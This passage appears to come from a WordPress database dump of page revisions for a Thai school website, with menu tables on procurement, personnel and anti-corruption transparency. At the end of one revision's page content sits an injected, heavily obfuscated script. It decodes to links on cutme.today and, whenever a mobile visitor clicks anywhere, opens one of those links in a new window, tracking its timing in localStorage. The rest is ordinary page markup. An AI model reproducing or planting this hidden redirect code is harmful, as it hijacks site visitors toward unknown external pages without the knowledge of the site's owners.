gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:08:59','2024-07-27 04:08:59','',14,'http://pakhaeng.ssk.in.th/?p=80',0,'revision','',0),
(81,1,'2024-07-27 11:10:03','2024-07-27 04:10:03','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap 